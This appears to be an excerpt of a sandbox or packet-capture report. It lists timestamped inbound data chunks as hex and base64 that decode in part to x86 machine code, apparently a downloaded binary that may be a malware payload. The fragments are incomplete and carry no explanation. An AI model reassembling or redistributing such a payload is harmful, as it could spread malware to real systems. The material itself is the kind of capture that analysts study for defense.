2022-11-03 11:39:58 UTC	54	IN	Data Raw: 34 41 41 41 41 4f 38 46 39 45 7a 4c 62 6a 55 6b 41 69 46 77 77 48 41 46 2b 58 49 74 47 58 44 76 42 66 50 49 50 74 6b 34 62 44 37 5a 57 47 67 2b 32 52 68 6d 49 54 6c 51 50 74 6b 34 59 69 46 5a 56 44 37 5a 57 46 34 68 47 56 67 2b 32 52 68 61 49 54 6c 63 50 74 6b 34 56 69 46 5a 59 44 37 5a 57 46 46 61 49 52 6c 6d 49 54 6c 71 49 56 6c 76 6f 39 50 6e 2f 2f 34 50 45 42 46 39 65 57 31 33 44 79 55 54 74 6d 38 41 75 2f 6a 48 68 5a 64 4b 51 56 59 76 73 56 6c 64 71 41 4f 68 6b 48 77 45 41 69 33 30 4d 69 33 55 49 44 37 62 49 67 38 51 45 4f 38 35 79 42 44 76 50 64 67 68 52 36 45 6f 66 41 51 44 72 36 6c 39 65 58 63 4e 31 32 68 37 6f 56 59 76 73 56 6c 66 6f 68 68 38 42 41 49 74 31 44 49 74 39 43 4d 48 6f 44 44 76 48 63 67 51 37 78 6e 59 48 36 48 41 66 41 51 44 72 37 6c Data Ascii: 4AAAAO8F9EzLbjUkAiFwwHAF+XItGXDvBfPIPtk4bD7ZWGg+2RhmITlQPtk4YiFZVD7ZWF4hGVg+2RhaITlcPtk4ViFZYD7ZWFFaIRlmITlqIVlvo9Pn//4PEBF9eW13DyUTtm8Au/jHhZdKQVYvsVldqAOhkHwEAi30Mi3UID7bIg8QEO85yBDvPdghR6EofAQDr6l9eXcN12h7oVYvsVlfohh8BAIt1DIt9CMHoDDvHcgQ7xnYH6HAfAQDr7l
2022-11-03 11:39:58 UTC	62	IN	Data Raw: 54 56 75 67 6d 6d 76 2f 2f 69 33 33 30 67 38 51 59 68 66 39 30 48 6d 6f 41 61 67 44 6f 4a 54 55 42 41 49 50 41 41 6c 43 4e 6a 6a 51 58 41 41 42 52 56 31 62 6f 41 5a 72 2f 2f 34 50 45 47 49 74 39 38 49 58 2f 64 42 35 71 41 47 6f 41 36 42 49 31 41 51 43 44 77 41 4a 51 6a 5a 61 30 46 77 41 41 55 6c 64 57 36 4e 79 5a 2f 2f 2b 44 78 42 68 57 36 41 4f 36 41 41 43 44 78 41 52 66 58 6c 75 4c 35 56 33 44 6f 50 59 2f 4f 62 77 4e 2f 79 53 30 56 59 76 73 67 65 77 4d 41 51 41 41 55 31 59 7a 77 46 64 71 50 31 43 4a 52 66 79 4a 52 66 53 4a 52 66 69 49 52 62 53 4e 52 62 56 51 36 45 6f 43 41 51 43 4e 54 62 52 71 42 46 48 6f 33 77 30 42 41 49 74 31 43 47 70 31 56 75 6a 6b 33 2f 2f 2f 69 39 68 71 64 46 61 4a 58 51 6a 6f 31 39 2f 2f 2f 34 50 45 4a 49 76 34 68 64 74 31 47 49 Data Ascii: TVugmmv//i330g8QYhf90HmoAagDoJTUBAIPAAlCNjjQXAABRV1boAZr//4PEGIt98IX/dB5qAGoA6BI1AQCDwAJQjZa0FwAAUldW6NyZ//+DxBhW6AO6AACDxARfXluL5V3DoPY/ObwN/yS0VYvsgewMAQAAU1YzwFdqP1CJRfyJRfSJRfiIRbSNRbVQ6EoCAQCNTbRqBFHo3w0BAIt1CGp1Vujk3///i9hqdFaJXQjo19///4PEJIv4hdt1GI
2022-11-03 11:39:58 UTC	70	IN	Data Raw: 4c 46 34 31 4e 2b 46 46 53 2f 39 42 66 58 72 67 42 41 41 41 41 57 34 76 6c 58 63 4f 49 45 78 6f 42 69 4c 53 64 69 56 57 4c 37 49 48 73 58 41 49 41 41 46 5a 71 51 49 31 46 73 47 6f 41 55 4f 67 35 36 77 41 41 4d 38 6c 6f 42 67 49 41 41 44 50 41 55 59 32 56 70 76 33 2f 2f 31 4c 48 52 66 41 41 41 41 41 41 69 55 58 30 69 55 58 34 69 55 58 38 78 30 57 73 52 41 41 41 41 47 61 4a 6a 61 54 39 2f 2f 2f 6f 42 65 73 41 41 49 74 31 43 47 6f 41 61 69 6d 4e 68 61 54 39 2f 2f 39 51 56 75 69 68 49 77 41 41 69 30 55 4d 61 67 43 4e 54 66 42 52 6a 56 57 73 55 6d 6f 41 61 67 42 6f 41 41 41 41 43 47 6f 42 61 67 42 71 41 46 43 4e 6a 61 54 39 2f 2f 39 52 61 67 42 57 36 45 58 54 41 41 43 44 78 46 79 46 77 48 55 46 58 6f 76 6c 58 63 4f 4c 56 66 42 71 41 47 6f 41 55 6c 62 6f 36 38 Data Ascii: LF41N+FFS/9BfXrgBAAAAW4vlXcOIExoBiLSdiVWL7IHsXAIAAFZqQI1FsGoAUOg56wAAM8loBgIAADPAUY2Vpv3//1LHRfAAAAAAiUX0iUX4iUX8x0WsRAAAAGaJjaT9///oBesAAIt1CGoAaimNhaT9//9QVuihIwAAi0UMagCNTfBRjVWsUmoAagBoAAAACGoBagBqAFCNjaT9//9RagBW6EXTAACDxFyFwHUFXovlXcOLVfBqAGoAUlbo68
2022-11-03 11:39:58 UTC	78	IN	Data Raw: 52 56 2b 6a 6d 59 77 41 41 69 2f 69 44 78 42 53 46 2f 33 51 55 61 67 42 71 41 46 62 6f 47 77 63 42 41 49 50 41 41 6c 42 71 41 47 6f 41 2f 39 64 66 75 41 45 41 41 41 42 65 69 2b 56 64 77 31 38 7a 77 46 36 4c 35 56 33 44 62 63 47 4d 69 47 6c 32 56 59 76 73 67 65 77 49 41 67 41 41 56 6f 74 31 43 46 65 4c 76 74 67 48 41 41 43 46 2f 77 2b 45 4b 51 45 41 41 49 4f 2f 6d 47 67 41 41 41 41 50 68 42 77 42 41 41 43 4c 68 69 51 4b 41 41 42 54 55 46 62 6f 75 62 6b 41 41 44 50 4a 61 41 59 43 41 41 42 52 6a 5a 58 36 2f 66 2f 2f 55 73 65 47 4a 41 6f 41 41 41 41 41 41 41 42 6d 69 59 33 34 2f 66 2f 2f 36 47 54 54 41 41 43 4c 68 6c 51 4c 41 41 42 71 41 56 43 4e 54 51 68 52 56 75 68 42 35 76 2f 2f 61 67 42 71 41 34 32 56 2b 50 33 2f 2f 31 4a 57 36 43 44 46 2f 2f 2b 4e 68 66 Data Ascii: RV+jmYwAAi/iDxBSF/3QUagBqAFboGwcBAIPAAlBqAGoA/9dfuAEAAABei+Vdw18zwF6L5V3DbcGMiGl2VYvsgewIAgAAVot1CFeLvtgHAACF/w+EKQEAAIO/mGgAAAAPhBwBAACLhiQKAABTUFboubkAADPJaAYCAABRjZX6/f//UseGJAoAAAAAAABmiY34/f//6GTTAACLhlQLAABqAVCNTQhRVuhB5v//agBqA42V+P3//1JW6CDF//+Nhf
2022-11-03 11:39:58 UTC	86	IN	Data Raw: 42 68 63 42 31 4b 34 75 2f 32 41 63 41 41 49 58 2f 64 42 69 44 50 6a 4a 31 45 38 65 48 51 43 41 41 41 41 45 41 41 41 43 4c 52 67 53 4a 68 30 51 67 41 41 42 66 58 6a 50 41 57 34 76 6c 58 63 4f 4c 46 6c 4a 52 56 2b 69 44 68 51 41 41 67 38 51 4d 67 33 34 51 41 48 54 6b 67 33 34 55 41 48 54 65 67 33 34 59 41 48 54 59 67 33 34 63 41 48 54 53 67 33 34 67 41 48 54 4d 67 33 34 6b 41 48 54 47 67 33 34 6f 41 48 54 41 67 33 34 73 41 48 53 36 67 33 34 77 41 48 53 30 67 33 34 30 41 48 53 75 61 6a 2b 4e 52 63 46 71 41 46 44 47 52 63 41 41 36 41 4f 38 41 41 43 4e 54 63 42 71 42 6c 48 6f 6d 4d 63 41 41 49 31 56 77 46 4a 54 36 48 36 71 2f 2f 2b 44 78 42 79 4a 52 51 79 46 77 41 2b 45 65 76 2f 2f 2f 32 70 4f 56 2b 67 49 53 77 41 41 55 49 74 46 44 47 6f 41 61 67 42 51 55 2b Data Ascii: BhcB1K4u/2AcAAIX/dBiDPjJ1E8eHQCAAAAEAAACLRgSJh0QgAABfXjPAW4vlXcOLFlJRV+iDhQAAg8QMg34QAHTkg34UAHTeg34YAHTYg34cAHTSg34gAHTMg34kAHTGg34oAHTAg34sAHS6g34wAHS0g340AHSuaj+NRcFqAFDGRcAA6AO8AACNTcBqBlHomMcAAI1VwFJT6H6q//+DxByJRQyFwA+Eev///2pOV+gISwAAUItFDGoAagBQU+
2022-11-03 11:39:58 UTC	94	IN	Data Raw: 71 41 49 31 56 73 4d 61 45 42 51 6a 39 2f 2f 39 63 55 6f 32 46 43 50 33 2f 2f 31 44 6f 67 36 67 41 41 49 32 4e 43 50 33 2f 2f 31 47 4e 56 78 78 53 36 49 4f 54 2f 2f 2b 44 78 42 69 4a 41 34 58 41 44 34 52 42 41 67 41 41 4d 38 42 6f 6c 41 45 41 41 46 43 4a 68 51 33 2b 2f 2f 2b 4a 68 52 48 2b 2f 2f 2b 4a 68 52 58 2b 2f 2f 39 6d 69 59 55 5a 2f 76 2f 2f 69 49 55 62 2f 76 2f 2f 6a 59 55 63 2f 76 2f 2f 55 4d 61 46 44 50 37 2f 2f 77 44 6f 72 4b 51 41 41 49 74 4e 45 46 47 4e 6c 51 7a 2b 2f 2f 39 53 56 2b 69 37 39 2f 2f 2f 67 38 51 59 68 63 41 50 68 4f 73 42 41 41 43 4c 52 52 42 51 55 31 66 6f 74 57 30 41 41 47 70 4e 56 2b 69 74 4d 77 41 41 69 30 32 73 55 47 6f 41 61 67 42 52 6a 56 63 63 55 75 68 62 4e 41 41 41 67 38 51 6f 67 33 34 34 41 49 6c 47 51 41 2b 45 74 67 Data Ascii: qAI1VsMaEBQj9//9cUo2FCP3//1Dog6gAAI2NCP3//1GNVxxS6IOT//+DxBiJA4XAD4RBAgAAM8BolAEAAFCJhQ3+//+JhRH+//+JhRX+//9miYUZ/v//iIUb/v//jYUc/v//UMaFDP7//wDorKQAAItNEFGNlQz+//9SV+i79///g8QYhcAPhOsBAACLRRBQU1fotW0AAGpNV+itMwAAi02sUGoAagBRjVccUuhbNAAAg8Qog344AIlGQA+Etg
2022-11-03 11:39:58 UTC	101	IN	Data Raw: 41 41 47 6f 41 6a 55 33 49 55 56 4c 6f 66 35 45 41 41 49 31 46 79 46 44 6f 42 70 41 41 41 41 50 41 41 59 59 49 43 67 41 41 69 30 76 38 55 56 62 6f 70 50 33 2f 2f 34 75 47 42 41 6f 41 41 47 6f 41 6a 56 58 67 55 6c 44 6f 55 70 45 41 41 49 31 4e 34 46 48 6f 32 59 38 41 41 41 50 41 41 59 59 49 43 67 41 41 69 34 59 45 43 67 41 41 61 67 43 4e 56 5a 68 53 55 4f 67 76 6b 51 41 41 6a 55 32 59 55 65 69 32 6a 77 41 41 41 38 41 42 68 67 67 4b 41 41 43 4c 45 31 4a 57 36 46 58 39 2f 2f 2b 4c 6a 67 51 4b 41 41 43 44 78 45 42 71 41 49 31 46 34 46 42 52 36 41 43 52 41 41 43 4e 56 65 42 53 36 49 65 50 41 41 43 4c 6a 67 51 4b 41 41 41 44 77 41 47 47 43 41 6f 41 41 47 6f 41 6a 55 57 41 55 46 48 6f 33 5a 41 41 41 49 31 56 67 46 4c 6f 5a 49 38 41 41 41 50 41 41 59 59 49 43 67 Data Ascii: AAGoAjU3IUVLof5EAAI1FyFDoBpAAAAPAAYYICgAAi0v8UVbopP3//4uGBAoAAGoAjVXgUlDoUpEAAI1N4FHo2Y8AAAPAAYYICgAAi4YECgAAagCNVZhSUOgvkQAAjU2YUei2jwAAA8ABhggKAACLE1JW6FX9//+LjgQKAACDxEBqAI1F4FBR6ACRAACNVeBS6IePAACLjgQKAAADwAGGCAoAAGoAjUWAUFHo3ZAAAI1VgFLoZI8AAAPAAYYICg
2022-11-03 11:39:58 UTC	109	IN	Data Raw: 41 41 38 6c 52 69 77 39 51 55 31 4a 53 55 6c 46 57 36 49 74 62 41 41 43 4c 46 31 4a 57 69 39 6a 6f 55 46 77 41 41 49 50 45 4d 49 58 62 65 4a 79 4c 68 75 77 48 41 41 43 4c 54 65 68 66 58 6f 30 45 51 56 75 4c 35 56 33 44 67 2f 6b 4d 64 55 47 4c 54 52 67 37 79 67 2b 45 65 66 2f 2f 2f 31 4b 4a 56 66 69 4e 56 66 68 53 55 49 73 48 67 63 48 63 49 41 45 41 55 56 4e 71 41 47 6f 41 61 67 42 51 56 75 69 47 57 77 41 41 69 77 39 52 56 75 6a 39 57 77 41 41 69 30 58 6f 67 38 51 77 58 31 35 62 69 2b 56 64 77 34 50 35 44 51 2b 45 4d 51 45 41 41 49 50 35 44 67 2b 45 4b 41 45 41 41 49 50 35 43 33 55 37 69 34 37 6b 42 77 41 41 55 6f 31 46 2b 46 43 4c 68 75 41 48 41 41 42 52 69 77 39 51 55 31 4a 53 55 6c 46 57 69 56 58 34 36 4f 5a 61 41 41 43 4c 46 31 4a 57 36 4b 31 62 41 41 Data Ascii: AA8lRiw9QU1JSUlFW6ItbAACLF1JWi9joUFwAAIPEMIXbeJyLhuwHAACLTehfXo0EQVuL5V3Dg/kMdUGLTRg7yg+Eef///1KJVfiNVfhSUIsHgcHcIAEAUVNqAGoAagBQVuiGWwAAiw9RVuj9WwAAi0Xog8QwX15bi+Vdw4P5DQ+EMQEAAIP5Dg+EKAEAAIP5C3U7i47kBwAAUo1F+FCLhuAHAABRiw9QU1JSUlFWiVX46OZaAACLF1JW6K1bAA
2022-11-03 11:39:58 UTC	117	IN	Data Raw: 71 41 46 43 4e 54 78 78 52 36 4c 48 75 2f 2f 2b 44 78 42 53 4a 52 6a 79 44 66 6b 41 41 64 52 79 4c 56 67 68 6f 32 35 79 37 5a 47 6f 41 61 67 42 53 6a 55 63 63 55 4f 69 50 37 76 2f 2f 67 38 51 55 69 55 5a 41 67 33 35 45 41 48 55 63 69 30 34 49 61 46 49 53 4a 4e 42 71 41 47 6f 41 55 59 50 48 48 46 66 6f 62 65 37 2f 2f 34 50 45 46 49 6c 47 52 46 39 65 69 2b 56 64 77 38 78 56 69 2b 79 44 37 41 68 54 69 31 30 49 56 6f 75 7a 6b 41 73 41 41 46 63 7a 2f 34 6c 39 2f 49 6c 39 2b 44 6c 2b 51 41 2b 45 74 67 41 41 41 49 74 47 52 44 76 48 44 34 53 72 41 41 41 41 6a 55 33 34 55 59 31 56 2f 46 4c 2f 30 49 74 46 2b 44 76 48 44 34 53 57 41 41 41 41 55 46 50 6f 56 6c 38 41 41 49 76 34 67 38 51 49 68 66 38 50 68 49 49 41 41 41 43 4c 52 66 69 4c 54 66 79 4c 56 6b 42 58 55 46 Data Ascii: qAFCNTxxR6LHu//+DxBSJRjyDfkAAdRyLVgho25y7ZGoAagBSjUccUOiP7v//g8QUiUZAg35EAHUci04IaFISJNBqAGoAUYPHHFfobe7//4PEFIlGRF9ei+Vdw8xVi+yD7AhTi10IVouzkAsAAFcz/4l9/Il9+Dl+QA+EtgAAAItGRDvHD4SrAAAAjU34UY1V/FL/0ItF+DvHD4SWAAAAUFPoVl8AAIv4g8QIhf8PhIIAAACLRfiLTfyLVkBXUF
2022-11-03 11:39:58 UTC	125	IN	Data Raw: 69 46 43 6a 42 6c 64 5a 52 57 2f 30 54 57 51 51 4b 6f 67 57 64 6f 72 6c 75 4e 79 6b 4a 6a 52 34 37 49 31 6a 2f 42 77 51 38 6b 4b 6c 49 61 4f 5a 44 39 67 53 6e 6c 76 4c 50 2b 55 72 37 55 31 56 31 6f 4e 63 59 42 35 54 4a 74 67 67 67 6e 42 4b 6e 7a 31 6f 6a 31 50 65 48 4b 53 4c 39 6c 47 2b 2f 72 45 6c 58 54 30 73 50 73 78 52 49 6c 61 58 64 55 66 6d 6b 78 6c 64 78 77 4d 59 55 2f 71 32 79 67 64 51 4c 43 6a 4b 75 4b 34 52 77 35 59 36 4c 61 73 47 59 71 43 49 67 69 78 6f 67 7a 56 32 54 7a 61 67 61 56 5a 54 35 55 65 48 59 46 38 67 68 48 6e 79 42 58 76 71 41 6f 33 61 72 48 64 7a 47 4c 43 2f 36 79 33 6b 6d 39 38 58 61 7a 6f 34 42 46 54 2b 57 2b 31 39 76 50 46 52 6b 36 36 4a 61 2f 66 5a 43 53 63 46 7a 53 62 66 32 47 76 58 79 54 31 6d 34 31 61 74 6b 6a 41 6a 56 44 4f Data Ascii: iFCjBldZRW/0TWQQKogWdorluNykJjR47I1j/BwQ8kKlIaOZD9gSnlvLP+Ur7U1V1oNcYB5TJtgggnBKnz1oj1PeHKSL9lG+/rElXT0sPsxRIlaXdUfmkxldxwMYU/q2ygdQLCjKuK4Rw5Y6LasGYqCIgixogzV2TzagaVZT5UeHYF8ghHnyBXvqAo3arHdzGLC/6y3km98Xazo4BFT+W+19vPFRk66Ja/fZCScFzSbf2GvXyT1m41atkjAjVDO
2022-11-03 11:39:58 UTC	133	IN	Data Raw: 41 41 46 4e 58 36 46 51 64 41 41 42 57 56 2b 68 4e 48 51 41 41 67 38 51 51 57 31 39 65 69 2b 56 64 77 34 32 57 51 4e 42 75 41 49 6c 56 44 49 74 56 43 49 50 47 61 49 50 43 62 49 6c 56 35 4f 6c 45 2f 2f 2f 2f 5a 79 39 74 6e 7a 55 67 79 7a 53 72 56 59 76 73 67 65 7a 41 41 41 41 41 4d 38 42 57 69 55 58 4d 69 55 58 51 69 45 58 34 69 55 58 35 5a 6f 6c 46 2f 59 68 46 2f 31 65 77 62 34 68 46 34 44 50 41 61 6e 39 51 69 55 58 6c 69 55 58 70 69 55 58 74 5a 6f 6c 46 38 59 68 46 38 34 69 46 51 50 2f 2f 2f 34 32 46 51 66 2f 2f 2f 31 44 48 52 63 67 71 4c 79 6f 41 78 30 58 30 55 45 39 54 56 4d 64 46 31 46 64 70 62 6d 54 48 52 64 68 76 64 33 4d 67 78 30 58 63 52 58 68 77 62 4d 64 46 34 58 4a 6c 63 67 44 6f 4f 69 38 41 41 49 74 31 44 49 74 4e 43 49 75 35 32 41 63 41 41 49 Data Ascii: AAFNX6FQdAABWV+hNHQAAg8QQW19ei+Vdw42WQNBuAIlVDItVCIPGaIPCbIlV5OlE////Zy9tnzUgyzSrVYvsgezAAAAAM8BWiUXMiUXQiEX4iUX5ZolF/YhF/1ewb4hF4DPAan9QiUXliUXpiUXtZolF8YhF84iFQP///42FQf///1DHRcgqLyoAx0X0UE9TVMdF1FdpbmTHRdhvd3Mgx0XcRXhwbMdF4XJlcgDoOi8AAIt1DItNCIu52AcAAI
2022-11-03 11:39:58 UTC	140	IN	Data Raw: 4e 45 49 50 45 46 46 4b 4c 56 51 78 51 69 77 5a 52 55 76 2f 51 58 6c 33 44 4b 51 45 30 46 2b 6f 71 73 75 36 30 4a 6c 57 4c 37 49 74 46 43 49 74 49 45 46 5a 71 4d 32 6f 41 55 59 32 77 62 41 77 41 41 46 5a 51 36 45 51 4a 41 41 43 4c 56 52 43 4c 52 51 79 4c 44 6f 50 45 46 46 4a 51 2f 39 46 65 58 63 50 4d 7a 46 57 4c 37 49 74 46 43 49 74 49 45 46 5a 71 4e 47 6f 41 55 59 32 77 63 41 77 41 41 46 5a 51 36 42 51 4a 41 41 43 4c 56 52 53 4c 52 52 43 4c 54 51 79 44 78 42 52 53 69 78 5a 51 55 66 2f 53 58 6c 33 44 38 74 52 4f 72 35 56 33 42 4f 37 72 64 45 32 55 75 51 39 56 69 2b 79 4c 52 51 69 4c 53 42 42 57 61 6a 56 71 41 46 47 4e 73 48 51 4d 41 41 42 57 55 4f 6a 55 43 41 41 41 69 31 55 55 69 30 55 51 69 30 30 4d 67 38 51 55 55 6f 73 57 55 46 48 2f 30 6c 35 64 77 36 Data Ascii: NEIPEFFKLVQxQiwZRUv/QXl3DKQE0F+oqsu60JlWL7ItFCItIEFZqM2oAUY2wbAwAAFZQ6EQJAACLVRCLRQyLDoPEFFJQ/9FeXcPMzFWL7ItFCItIEFZqNGoAUY2wcAwAAFZQ6BQJAACLVRSLRRCLTQyDxBRSixZQUf/SXl3D8tROr5V3BO7rdE2UuQ9Vi+yLRQiLSBBWajVqAFGNsHQMAABWUOjUCAAAi1UUi0UQi00Mg8QUUosWUFH/0l5dw6
2022-11-03 11:39:58 UTC	148	IN	Data Raw: 51 69 30 55 49 69 55 30 51 6a 55 30 51 55 59 73 49 61 67 43 4e 56 51 78 53 55 56 44 6f 30 2b 66 2f 2f 7a 50 53 67 38 51 63 68 63 41 50 6d 4d 4b 4e 51 76 38 6a 52 51 78 64 77 38 78 56 69 2b 79 4c 52 52 43 4c 54 52 69 4c 56 52 52 52 55 6f 6c 46 45 49 31 46 45 46 43 4c 52 51 69 4c 45 49 31 4e 44 46 46 53 55 4f 6a 62 35 2f 2f 2f 67 38 51 59 68 63 42 35 42 44 50 41 58 63 4d 7a 79 59 58 41 44 35 54 42 69 38 46 64 77 79 6f 56 38 44 6a 45 56 59 76 73 69 30 55 4d 55 49 74 46 43 49 74 49 43 47 6f 41 55 56 44 6f 6d 75 6a 2f 2f 34 50 45 45 46 33 44 49 32 30 4d 72 49 5a 56 69 2b 79 4c 54 52 43 4c 52 51 79 46 79 58 34 53 56 6f 74 31 43 43 76 77 69 68 42 4a 69 42 51 47 51 49 58 4a 66 2f 56 65 58 63 4d 31 4a 46 66 74 43 63 73 30 48 47 34 45 6a 6a 2b 78 65 72 4e 56 69 2b Data Ascii: Qi0UIiU0QjU0QUYsIagCNVQxSUVDo0+f//zPSg8QchcAPmMKNQv8jRQxdw8xVi+yLRRCLTRiLVRRRUolFEI1FEFCLRQiLEI1NDFFSUOjb5///g8QYhcB5BDPAXcMzyYXAD5TBi8FdwyoV8DjEVYvsi0UMUItFCItICGoAUVDomuj//4PEEF3DI20MrIZVi+yLTRCLRQyFyX4SVot1CCvwihBJiBQGQIXJf/VeXcM1JFftCcs0HG4Ejj+xerNVi+
2022-11-03 11:39:58 UTC	156	IN	Data Raw: 6b 42 49 74 45 4a 42 43 4a 52 43 51 49 69 30 51 6b 46 49 6c 45 4a 41 79 4c 52 43 51 59 69 55 51 6b 45 49 74 45 4a 42 79 4a 52 43 51 55 69 30 51 6b 42 49 6c 45 4a 42 79 4c 52 43 51 49 69 55 51 6b 47 4f 68 36 41 41 41 41 67 38 41 43 69 55 51 6b 42 46 69 4c 2f 31 57 4c 37 46 44 44 6b 4a 43 4c 52 43 51 63 67 2b 41 42 68 63 42 31 41 63 4e 59 69 2b 56 64 67 2b 77 49 55 49 74 45 4a 41 79 4a 52 43 51 45 69 30 51 6b 45 49 6c 45 4a 41 69 4c 52 43 51 55 69 55 51 6b 44 49 74 45 4a 42 69 4a 52 43 51 51 69 30 51 6b 48 49 6c 45 4a 42 53 4c 52 43 51 67 69 55 51 6b 47 49 74 45 4a 41 53 4a 52 43 51 67 69 30 51 6b 43 49 6c 45 4a 42 7a 6f 45 41 41 41 41 49 50 41 41 6f 6c 45 4a 41 52 59 69 2f 39 56 69 2b 78 51 77 35 44 6f 41 41 41 41 41 46 6a 44 61 49 69 49 69 49 68 51 36 47 Data Ascii: kBItEJBCJRCQIi0QkFIlEJAyLRCQYiUQkEItEJByJRCQUi0QkBIlEJByLRCQIiUQkGOh6AAAAg8ACiUQkBFiL/1WL7FDDkJCLRCQcg+ABhcB1AcNYi+Vdg+wIUItEJAyJRCQEi0QkEIlEJAiLRCQUiUQkDItEJBiJRCQQi0QkHIlEJBSLRCQgiUQkGItEJASJRCQgi0QkCIlEJBzoEAAAAIPAAolEJARYi/9Vi+xQw5DoAAAAAFjDaIiIiIhQ6G
2022-11-03 11:39:58 UTC	164	IN	Data Raw: 79 67 4f 33 53 77 51 30 7a 70 78 7a 41 42 59 48 54 76 78 6d 38 33 41 2b 4e 6e 50 37 2f 2f 32 6b 74 66 5a 76 4e 35 6b 45 32 41 41 43 41 32 65 48 41 4a 52 52 41 66 76 36 6d 67 66 47 59 5a 65 4b 4f 54 34 63 31 49 7a 34 48 64 6f 38 46 4e 5a 31 52 63 6f 48 55 6c 41 43 74 66 38 41 6c 45 42 4e 32 49 4d 6b 35 44 59 65 6c 41 42 62 42 4c 54 75 78 32 4f 6a 4e 44 4c 4c 42 4c 66 38 48 34 47 41 52 69 7a 55 2f 4b 53 78 6f 47 53 57 4d 44 49 37 6a 67 4f 54 53 43 69 55 6b 76 6a 38 75 43 67 58 4b 2f 32 58 33 43 68 55 51 43 56 4f 52 77 53 57 46 72 75 78 5a 31 72 55 59 55 6c 59 62 44 62 6c 4a 66 4c 49 5a 4a 64 4f 58 34 72 30 49 48 62 64 65 65 32 46 4e 48 4c 63 72 42 59 55 4d 56 72 44 42 44 57 4c 6b 65 6b 48 55 67 50 75 4b 77 51 30 44 71 30 45 4b 58 4d 50 44 51 6f 55 74 37 55 Data Ascii: ygO3SwQ0zpxzABYHTvxm83A+NnP7//2ktfZvN5kE2AACA2eHAJRRAfv6mgfGYZeKOT4c1Iz4Hdo8FNZ1RcoHUlACtf8AlEBN2IMk5DYelABbBLTux2OjNDLLBLf8H4GARizU/KSxoGSWMDI7jgOTSCiUkvj8uCgXK/2X3ChUQCVORwSWFruxZ1rUYUlYbDblJfLIZJdOX4r0IHbdee2FNHLcrBYUMVrDBDWLkekHUgPuKwQ0Dq0EKXMPDQoUt7U
2022-11-03 11:39:58 UTC	172	IN	Data Raw: 63 79 38 55 6d 63 54 73 41 65 31 5a 6e 34 4e 77 32 49 69 59 69 50 47 62 46 78 56 36 37 6c 76 36 44 38 73 4e 72 36 6b 67 55 37 43 70 75 5a 35 58 49 6e 62 69 69 76 69 65 43 72 55 6e 38 7a 5a 67 38 2b 76 4e 52 68 2b 6c 6f 5a 76 64 5a 5a 2f 79 56 6c 2b 46 6e 62 42 4c 4d 51 33 61 59 71 57 69 44 65 7a 59 33 4e 31 78 56 70 6b 74 71 36 49 63 2b 5a 52 7a 7a 36 78 57 79 70 6f 62 75 36 45 66 52 6d 77 41 41 63 78 79 54 6f 30 76 52 71 47 31 56 45 57 5a 71 2b 71 4c 41 2b 69 79 4c 48 63 6b 69 56 77 6b 79 72 34 48 75 4c 63 6e 78 64 65 63 42 64 74 33 56 31 79 46 48 42 66 30 57 43 46 42 57 73 35 56 6c 4f 70 46 4a 77 64 37 37 61 76 57 72 38 4a 49 4b 34 70 59 30 65 50 39 46 4e 56 44 44 77 56 64 4a 77 59 42 62 31 31 6f 30 7a 34 51 48 55 54 6a 46 54 6d 75 6e 32 6c 59 56 6a 58 Data Ascii: cy8UmcTsAe1Zn4Nw2IiYiPGbFxV67lv6D8sNr6kgU7CpuZ5XInbiivieCrUn8zZg8+vNRh+loZvdZZ/yVl+FnbBLMQ3aYqWiDezY3N1xVpktq6Ic+ZRzz6xWypobu6EfRmwAAcxyTo0vRqG1VEWZq+qLA+iyLHckiVwkyr4HuLcnxdecBdt3V1yFHBf0WCFBWs5VlOpFJwd77avWr8JIK4pY0eP9FNVDDwVdJwYBb11o0z4QHUTjFTmun2lYVjX
2022-11-03 11:39:58 UTC	179	IN	Data Raw: 63 4b 6f 48 33 4a 33 65 68 70 46 4c 30 39 4e 6b 45 5a 4f 70 30 76 64 65 39 33 51 39 36 74 38 45 41 4a 56 71 4c 73 6f 38 6d 79 44 5a 43 6c 63 69 64 57 36 36 65 4e 6b 7a 6c 50 55 42 71 4e 7a 78 57 63 4d 47 6e 6e 48 6f 75 72 30 72 52 59 54 31 37 6d 75 4c 4f 36 4d 36 4b 78 70 75 4a 37 35 41 51 64 35 64 4b 6d 52 52 58 74 45 61 6c 31 53 6f 49 38 70 59 6a 48 2b 6a 4a 2b 6e 43 62 59 75 53 48 41 74 6a 6c 6b 4b 4c 46 52 6b 6f 78 52 58 35 33 36 6f 7a 4b 77 44 4f 6f 41 49 68 53 36 72 6e 47 50 50 43 59 56 35 34 4b 70 37 30 78 41 4e 39 75 47 69 4c 41 36 63 4d 79 61 57 6a 64 4a 65 76 67 36 51 76 48 69 76 50 42 4a 76 44 48 45 5a 4a 49 6d 50 48 64 6a 45 51 4c 61 67 69 33 67 71 6c 36 2f 42 56 6e 39 39 44 59 70 56 69 70 6f 4d 6d 68 43 35 47 72 65 57 79 2f 61 46 4c 6f 69 36 Data Ascii: cKoH3J3ehpFL09NkEZOp0vde93Q96t8EAJVqLso8myDZClcidW66eNkzlPUBqNzxWcMGnnHour0rRYT17muLO6M6KxpuJ75AQd5dKmRRXtEal1SoI8pYjH+jJ+nCbYuSHAtjlkKLFRkoxRX536ozKwDOoAIhS6rnGPPCYV54Kp70xAN9uGiLA6cMyaWjdJevg6QvHivPBJvDHEZJImPHdjEQLagi3gql6/BVn99DYpVipoMmhC5GreWy/aFLoi6
2022-11-03 11:39:58 UTC	187	IN	Data Raw: 38 69 39 32 6b 75 45 6d 47 6d 59 2f 2f 54 76 37 51 76 48 2b 30 73 6b 55 37 39 77 70 77 73 35 69 45 4d 61 70 33 5a 4d 4f 73 61 4b 36 51 56 30 75 6e 74 44 34 55 70 34 57 78 73 6a 75 47 59 39 4f 35 52 63 75 72 6f 4f 57 66 46 58 66 67 4f 41 67 65 78 65 6e 70 4d 2f 50 56 33 71 7a 38 78 6f 75 34 35 45 54 68 66 30 32 6b 79 79 64 43 49 35 6f 57 6e 4a 6a 35 36 73 52 6e 49 2b 35 76 41 36 77 55 47 48 2b 34 50 4b 33 47 5a 33 67 49 63 36 33 47 6f 36 51 54 42 77 4a 57 6c 2b 59 6a 4b 45 74 77 49 30 74 4b 4e 46 58 32 53 64 56 46 30 6d 39 7a 6d 6f 53 6a 73 32 44 6b 67 39 4a 48 6f 41 61 56 4f 54 64 35 33 76 67 4f 77 72 59 58 57 62 53 35 53 33 62 48 30 30 7a 78 63 43 42 62 70 52 6a 52 58 32 43 37 56 7a 64 56 36 46 65 63 56 6d 72 31 76 33 62 50 74 70 37 4f 55 41 33 75 55 4b Data Ascii: 